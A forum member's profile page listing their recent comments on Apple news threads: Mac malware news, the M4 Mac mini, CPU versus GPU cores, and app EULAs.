dope_ahmine
About
- Username
- dope_ahmine
- Joined
- Visits
- 52
- Last Active
- Roles
- member
- Points
- 725
- Badges
- 0
- Posts
- 270
Reactions
-
North Korean hackers use infected crypto apps to target Macs
Do they really execute remotely? I think these commands are still executing locally.@AppleInsider said:
One of the most concerning parts of the malware is its ability to execute remote AppleScript commands. -
M4 Mac mini review roundup: Pint-sized powerhouse that won't break the bank
blastdoor said:The Tech Crunch quotes seem oddball to me.
I guess if you landed on Earth in a pod yesterday you might not have a monitor, keyboard, and mouse handy. But I'll bet a very large share of adults over the age of, say, 30 have a monitor, keyboard, and mouse already. That's not a small market.
Sidecar over wifi is already quite decent, but with a usb-c cable you get yourself a a really nice monitor + keyboard + touch input. And there are plenty of iPad users out there that would love this setup. -
Generation gaps: How much faster Apple Silicon gets with each release
programmer said:chasm said:netrox said:Exactly why do we need to keep adding more CPU cores when most creative oriented applications would benefit from having more GPU cores?More GPUs are needed when you have really really large screens/more screens. More CPUs are needed when you need more graphics.The question of CPUs vs GPUs on the SoC is a complex one. Many applications don't use the GPU at all, except for the UI (which hardly needs any GPU at all) but are optimized for multiple CPUs... adding more GPU for those applications gets you nothing. Even GPU-heavy applications can also benefit from more CPUs, in some cases. Ultimately though, the GPUs tend to be memory bandwidth limited, so scaling up the GPU beyond what the memory bandwidth can support gets us very little.
On top of that, GPUs today are crucial for AI and creative tasks because of their ability to handle tons of calculations in parallel, which is exactly what’s needed for training neural networks and other data-heavy workloads. Modern GPUs even come with specialized hardware, like NVIDIA’s Tensor Cores, that’s purpose-built for the matrix math involved in deep learning. This kind of hardware boost is why GPUs are so valuable for things like image recognition or natural language processing—they’re not just for “manipulating pixels”.
CPUs and GPUs actually complement each other in AI. CPUs handle tasks with lots of decision-making or data management, while GPUs jump in to power through the raw computation. It’s not just about one or the other; the best results come from using both for what each does best.
As for energy efficiency, GPUs perform many tasks at a much lower power cost than CPUs, which is huge for AI developers who need high-speed processing without the power drain (or cost) that would come from only using CPUs.
And on top of all that, new architectures are even starting to blend CPU and GPU functions—like Apple’s M-series chips, which let both CPU and GPU access the same memory to cut down on data transfer times and save power. Plus, with all the popular libraries like PyTorch, CUDA, and TensorFlow, it’s easier than ever to optimize code to leverage GPUs, so more developers can get the speed and efficiency benefits without diving deep into complex GPU programming. -
Facebook ad partner may have tried to listen into your conversations
iOS could add an inspection function to every app’s EULA. It would allow the user to access Apple Intelligence to “chat” with the EULA text before hitting the consent button. This would at least make it much more difficult for the app makers to hide important info in there, whether in cryptic language or small print. -
Is Apple finally serious about gaming after its latest push?